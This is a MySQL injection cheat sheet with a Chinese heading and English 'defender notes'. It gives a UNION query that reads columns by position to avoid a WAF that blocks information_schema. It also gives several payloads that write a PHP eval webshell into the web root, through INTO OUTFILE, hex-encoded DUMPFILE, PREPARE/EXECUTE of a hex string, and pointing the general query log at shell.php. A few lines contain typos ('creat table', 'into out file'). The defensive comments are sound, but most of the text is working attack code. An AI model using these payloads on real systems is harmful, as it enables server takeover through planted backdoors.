waf拦截了information_schema,columns,tables,database,schema等关键字或函数
# Positional column read: the derived table e takes its column names (1..4) from the constant
# first UNION branch, so e.4 is the column named 4 and LIMIT 1 OFFSET 3 selects one row of
# `test` without naming any column or touching information_schema / columns / tables.
# Defender note: a keyword denylist on the WAF cannot stop this class of query; the effective
# controls are parameterized queries in the application and least-privilege grants on `test`.
select * from test where id =1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from test)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
webshell
# Three variants of writing a PHP file to disk through the database server: a string literal via
# INTO OUTFILE, the same payload hex-encoded via INTO DUMPFILE, and a staging table `temp` whose
# single row is exported.
# Defender note: every variant depends on the connecting account holding the FILE privilege, on
# secure_file_priv permitting the target directory, and on mysqld having write access to the web
# root — withholding any one of the three closes the vector. Alert on FILE grants to application
# accounts and on files created under the web root by the mysqld process.
select '<?php @eval($_POST["pass"]);?>' into outfile 'var/www/html/shell.php'
select 0x3c3f70687020406576616c28245f504f53545b2270617373225d293b3f3e into dumpfile 'D:/www/shell.php'
drop table if exists temp;creat table temp(cmd text not null);insert into temp (cmd) values('<?php @eval($_POST["pass"]) ?>');select cmd from temp into out file '/var/www/html/shell.php';drop table if exists temp;
bypass outfile,dumpfile
# The INTO OUTFILE statement arrives as a hex literal in @a and is assembled server-side with
# PREPARE / EXECUTE, so a filter that matches the literal keywords never sees them.
# Defender note: this requires stacked (multi-statement) execution on the connection, which
# application drivers should not enable; the same FILE-privilege and secure_file_priv controls
# that govern INTO OUTFILE still apply, and a PREPARE of a hex literal issued by an application
# account is itself a high-signal audit event.
set @a =
0x73656c65637420273c3f70687020406576616c28245f504f53545b2270617373225d293b3f3e2720696e746f206f757466696c6520272f686f6d652f7777772f7368656c6c2e70687027;prepare cmd from @a;execute cmd;
# Redirects the server's general query log to a file under the web root so that the text of the
# next query is written there by the logger itself; secure_file_priv does not govern this path.
# Defender note: SET GLOBAL needs SUPER (SYSTEM_VARIABLES_ADMIN on 8.0) — never grant it to an
# application account; monitor runtime changes to general_log / general_log_file, and keep the
# mysqld process unable to write into any web-served directory.
show variables like '%general%'; # inspect the current general-log settings
set global general_log = on; # enable the general log
set global general_log_file= '/var/www/html/shell.php' # point the log file at the webshell path
select '<?php eval($_POST[pass]);?>' # write the shell (the logged statement text lands in the file)
# Column layout of MySQL's built-in general_log table (mysql.general_log, CSV engine), which
# receives the same entries as the file-based log when log_output includes TABLE.
# Presumably kept here for reference next to the file-based log steps — its intended use on
# this page is not stated; confirm before relying on it.
CREATE TABLE IF NOT EXISTS `general_log` (
`event_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
`user_host` mediumtext NOT NULL,
`thread_id` int(11) NOT NULL,
`server_id` int(10) unsigned NOT NULL,
`command_type` varchar(64) NOT NULL,
`argument` mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';